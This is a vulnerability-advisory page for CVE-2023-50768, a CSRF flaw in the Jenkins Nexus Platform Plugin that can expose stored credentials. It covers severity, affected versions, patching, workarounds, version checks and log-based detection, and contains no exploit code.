CVE-2023-50768 – This CSRF vulnerability in Jenkins Nexus Platfo... (How to Fix)

Q: What is the severity of CVE-2023-50768?

CVE-2023-50768 has a CVSS score of 8.8 (HIGH). This CSRF vulnerability in Jenkins Nexus Platform Plugin allows attackers to trick authenticated users into connecting Jenkins to malicious HTTP servers using stolen credentials. Attackers can capture sensitive credentials stored in Jenkins, affecting all Jenkins instances using vulnerable plugin versions.

📋 TL;DR

This CSRF vulnerability in Jenkins Nexus Platform Plugin allows attackers to trick authenticated users into connecting Jenkins to malicious HTTP servers using stolen credentials. Attackers can capture sensitive credentials stored in Jenkins, affecting all Jenkins instances using vulnerable plugin versions.

💻 Affected Systems

Products:

Jenkins Nexus Platform Plugin

Versions: 3.18.0-03 and earlier

Operating Systems: All platforms running Jenkins

Default Config Vulnerable: ⚠️ Yes

Notes: Requires Jenkins with the vulnerable plugin installed and users with configuration permissions.

📦 What is this software?

Nexus Platform by Jenkins

View all CVEs affecting Nexus Platform →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers steal all credentials stored in Jenkins, potentially compromising downstream systems, source code repositories, and deployment pipelines.

🟠

Likely Case

Attackers capture specific credentials to gain unauthorized access to connected systems like artifact repositories or deployment targets.

🟢

If Mitigated

With proper CSRF protections and credential access controls, impact is limited to unauthorized plugin configuration changes.

🌐 Internet-Facing: HIGH - Jenkins instances exposed to the internet are directly vulnerable to CSRF attacks from malicious websites.

🏢 Internal Only: MEDIUM - Internal users could still be tricked via phishing or compromised internal sites.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires the attacker to obtain valid credentials IDs first (through other means) and trick an authenticated user into visiting a malicious page.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.18.0-04 or later

Vendor Advisory: https://www.jenkins.io/security/advisory/2023-12-13/#SECURITY-3203

Restart Required: Yes

Instructions:

1. Update Jenkins Nexus Platform Plugin to version 3.18.0-04 or later via Jenkins Plugin Manager. 2. Restart Jenkins to apply the update.

🔧 Temporary Workarounds

Enable CSRF Protection

all

Ensure Jenkins CSRF protection is enabled globally

Check Jenkins → Manage Jenkins → Configure Global Security → Enable 'Prevent Cross Site Request Forgery exploits'

Restrict Plugin Configuration Access

all

Limit who can configure the Nexus Platform Plugin

Jenkins → Manage Jenkins → Manage and Assign Roles → Restrict 'Configure' permission for Nexus Platform Plugin

🧯 If You Can't Patch

Disable the Nexus Platform Plugin if not needed
Implement network segmentation to isolate Jenkins from untrusted networks

🔍 How to Verify

Check if Vulnerable:

Check Jenkins → Manage Jenkins → Manage Plugins → Installed tab → Find 'Nexus Platform Plugin' and check version

Check Version:

On Jenkins server: java -jar jenkins-cli.jar -s http://localhost:8080/ list-plugins | grep 'Nexus Platform Plugin'

Verify Fix Applied:

Verify plugin version is 3.18.0-04 or higher in Jenkins plugin manager

📡 Detection & Monitoring

Log Indicators:

Unexpected plugin configuration changes in Jenkins logs
Failed authentication attempts to new HTTP servers

Network Indicators:

Jenkins making outbound connections to unfamiliar HTTP servers
Unusual traffic patterns from Jenkins to external systems

SIEM Query:

source="jenkins.log" AND ("Nexus Platform Plugin" OR "credentials") AND ("configure" OR "update")

📊 Metadata

CVE ID: CVE-2023-50768

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-352

Published: December 13, 2023

Last Updated: May 22, 2025

🔗 References

http://www.openwall.com/lists/oss-security/2023/12/13/4 Mailing List
https://www.jenkins.io/security/advisory/2023-12-13/#SECURITY-3203 Vendor Advisory
http://www.openwall.com/lists/oss-security/2023/12/13/4 Mailing List
https://www.jenkins.io/security/advisory/2023-12-13/#SECURITY-3203 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-50768, you might also want to check these: